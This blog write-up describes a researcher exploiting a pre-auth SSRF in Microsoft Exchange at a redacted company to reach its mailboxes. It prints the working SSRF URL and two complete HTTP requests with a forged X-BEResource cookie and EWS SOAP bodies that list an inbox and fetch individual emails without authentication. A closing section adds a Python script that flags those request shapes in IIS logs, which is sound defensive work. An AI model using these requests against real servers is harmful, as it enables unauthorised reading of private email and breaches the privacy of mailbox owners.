Pre-Auth SSRF To Full MailBox Access (Microsoft Exchange Server Exploit)

Recently, while testing one of the popular Indian companies (for the sake of confidentiality, let's call it redacted.com), I found that “Outlook” was running on one of the subdomains. There were also other subdomains related to the same service:

“autodiscover.redacted.com”
“mail.redacted.com”
“legacy.redacted.com”

One of these subdomains showed the “Exchange Server Page”, with version information and other details like Username, SID, etc.

This seemed interesting, because I had previously heard about the “Exchange Server Exploits by Orange Tsai”.

I was sure that a vulnerable version of Exchange Server was running, so I read some blogs about this exploit to understand the source-code analysis and exploitation steps. Every blog has a different way to exploit this vulnerability; I combined my payloads from different resources.

It is a “Pre-auth SSRF to RCE”, but I was unable to get the RCE for some reasons.

Resources:
https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1
https://www.praetorian.com/blog/reproducing-proxylogon-exploit/
https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/

Exploitation:

 https://autodiscover.redacted.com/autodiscover/autodiscover.json?@test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test.com

Note: To understand how the SSRF is triggered, read the source-code analysis of Microsoft Exchange by PeterJson in one of the above-mentioned blogs. The SSRF was discovered through source-code analysis, and the exploit URL is publicly available.

So far, SSRF GET requests can be sent using the URL given above.

Some other interesting internal endpoints:

/powershell
/mapi/emsmdb
/autodiscover/autodiscover.xml
/ews/exchange.asmx
/owa/auth/Current/
/ecp/default.flt
/ecp/favicon.ico

/ews/exchange.asmx can be used to access the emails.

The valid XML formats and official documentation can be found at:

https://docs.microsoft.com/en-us/exchange/client-developer/web-service-reference/finditem-operation

To read the emails from the Exchange Server, a request to “/ecp/favicon.ico” (non-SSRF) must be sent with an “X-BEResource” cookie containing the “Exchange Server Address” and the SSRF endpoint (/ews/exchange.asmx).

POST /ecp/favicon.ico HTTP/1.1
Host: autodiscover.redacted.com
Content-Type: text/xml
Cookie: X-BEResource=[:[@redacted.com:444/ews/exchange.asmx#~1
Content-Length: 1128

<?xml version='1.0' encoding='utf-8'?>
<soap:Envelope
xmlns:soap='http://schemas.xmlsoap.org/soap/envelope/'
xmlns:t='http://schemas.microsoft.com/exchange/services/2006/types'
xmlns:m='http://schemas.microsoft.com/exchange/services/2006/messages'
xmlns:xsi='http://www.w3.org/2001/XMLSchema-instance'>
<soap:Header>
<t:RequestServerVersion Version="Exchange2016" />
</soap:Header>
<soap:Body>
<m:FindItem Traversal='Shallow'>
<m:ItemShape>
<t:BaseShape>AllProperties</t:BaseShape>
</m:ItemShape>
<m:ParentFolderIds>
<t:DistinguishedFolderId Id='inbox'>
<t:Mailbox>
<t:EmailAddress>info@redacted.com</t:EmailAddress>
</t:Mailbox>
</t:DistinguishedFolderId>
</m:ParentFolderIds>
</m:FindItem>
</soap:Body>
</soap:Envelope>

Email details of the given address can be seen in the response. It contains the email address, subject, date and attachments, but not the conversation of the email.

To read the conversations, an ItemId and ChangeKey are required, both of which can be found in the response of the above request.

Lastly, by crafting another request containing the ItemId and ChangeKey of the conversation we want to read, we can access the full email.

Payload used to retrieve individual emails without authentication:
POST /ecp/favicon.ico HTTP/1.1
Host: autodiscover.redacted.com
Content-Type: text/xml
Cookie: X-BEResource=[:[@redacted.com:444/ews/exchange.asmx#~1
Content-Length: 1062

<?xml version='1.0' encoding='utf-8'?>
<soap:Envelope
xmlns:soap='http://schemas.xmlsoap.org/soap/envelope/'
xmlns:t='http://schemas.microsoft.com/exchange/services/2006/types'
xmlns:m='http://schemas.microsoft.com/exchange/services/2006/messages'
xmlns:xsi='http://www.w3.org/2001/XMLSchema-instance'>
<soap:Header>
<t:RequestServerVersion Version="Exchange2016" />
</soap:Header>
<soap:Body>
<m:GetItem Traversal='Shallow'>
<m:ItemShape>
<t:BaseShape>AllProperties</t:BaseShape>
</m:ItemShape>
<m:ItemIds>
<t:ItemId Id="ItemID" ChangeKey="Changekey" />
</m:ItemIds>
</m:GetItem>
</soap:Body>
</soap:Envelope>
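From the defender's side, the two request shapes shown in this write-up (the autodiscover.json URL whose query string begins with "@" and nests an internal path, and a POST to a static /ecp/ resource such as favicon.ico) are both visible in the front-end IIS W3C logs, even though the X-BEResource cookie itself is not among the default logged fields. The following script is an added example, not part of the original post or any vendor tooling; it parses constructed sample log lines (the field layout, IPs and timestamps are assumptions made up for the example) and flags lines matching those two patterns, then tallies findings per client.

```python
"""Flag IIS W3C log lines matching the Exchange request shapes in the
write-up above. All log lines below are constructed for this example;
the field layout is a common (assumed) IIS layout, not a specific server's."""
import re
from collections import Counter
from dataclasses import dataclass

# Constructed sample log. Line 1 is the W3C #Fields header; line 3 mimics the
# SSRF URL from the post, line 4 the POST to /ecp/favicon.ico, and lines 2, 5
# and 6 are ordinary user traffic that must not be flagged.
SAMPLE_LOG = """\
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
2021-03-03 10:01:12 10.0.0.5 GET /owa/auth/logon.aspx url=https://mail.redacted.com/owa/ 443 - 198.51.100.7 Mozilla/5.0 200
2021-03-03 10:01:40 10.0.0.5 GET /autodiscover/autodiscover.json @test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test.com 443 - 203.0.113.9 python-requests/2.25 200
2021-03-03 10:02:05 10.0.0.5 POST /ecp/favicon.ico - 443 - 203.0.113.9 python-requests/2.25 200
2021-03-03 10:02:30 10.0.0.5 GET /ecp/favicon.ico - 443 jdoe 198.51.100.7 Mozilla/5.0 200
2021-03-03 10:03:11 10.0.0.5 GET /autodiscover/autodiscover.json Email=jdoe%40redacted.com&Protocol=ActiveSync 443 jdoe 198.51.100.7 Outlook/16.0 200
"""

# Internal endpoints listed in the post; a legitimate autodiscover.json query
# string never references another Exchange virtual directory.
INTERNAL_PATHS = ("/powershell", "/mapi/", "/autodiscover/", "/ews/", "/owa/", "/ecp/")
# Static resources under /ecp/ that no real client ever POSTs to.
STATIC_EXT = (".ico", ".flt", ".js", ".css", ".png", ".gif")


@dataclass
class Finding:
    line_no: int
    client_ip: str
    rule: str
    uri: str


def parse_w3c(text):
    """Yield (line_no, {field: value}) for each data line of a W3C log.
    The #Fields directive defines the column order; malformed lines are skipped
    rather than guessed at."""
    fields = None
    for no, raw in enumerate(text.splitlines(), 1):
        if raw.startswith("#Fields:"):
            fields = raw.split()[1:]
            continue
        if not raw or raw.startswith("#"):
            continue
        parts = raw.split(" ")
        if fields is None or len(parts) != len(fields):
            continue
        yield no, dict(zip(fields, parts))


def classify(rec):
    """Return a rule name if the record matches a suspicious shape, else None."""
    stem = rec["cs-uri-stem"].lower()
    query = rec["cs-uri-query"].lower()
    if stem.endswith("/autodiscover/autodiscover.json"):
        # Query string starting with '@' or embedding an internal path is the
        # path-confusion shape shown in the post, not a normal Email= lookup.
        if query.startswith("@") or any(p in query for p in INTERNAL_PATHS):
            return "autodiscover-json-ssrf"
    if rec["cs-method"].upper() == "POST" and stem.startswith("/ecp/") and stem.endswith(STATIC_EXT):
        return "post-to-ecp-static-resource"
    return None


def scan(text):
    """Run classify() over every parsed line and collect findings."""
    findings = []
    for no, rec in parse_w3c(text):
        rule = classify(rec)
        if rule is None:
            continue
        uri = rec["cs-uri-stem"]
        if rec["cs-uri-query"] != "-":
            uri += "?" + rec["cs-uri-query"]
        findings.append(Finding(no, rec["c-ip"], rule, uri))
    return findings


def by_client(findings):
    """Count findings per client IP so a single source hitting both rules stands out."""
    return dict(Counter(f.client_ip for f in findings))


if __name__ == "__main__":
    results = scan(SAMPLE_LOG)
    for f in results:
        print(f"line {f.line_no}: {f.rule} from {f.client_ip}: {f.uri}")
    print("per client:", by_client(results))
```

The rules deliberately key on URL shape only: on a real deployment the same logic should be run over the logs of both the Default Web Site and the Exchange Back End site, and a hit on both rules from one client IP within a short window is the strongest signal, since the SSRF URL is used to locate the backend and the favicon.ico POST to reach it.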

17 Y/o | OSCP | OSWE | Security Researcher | Twitter: VanshalG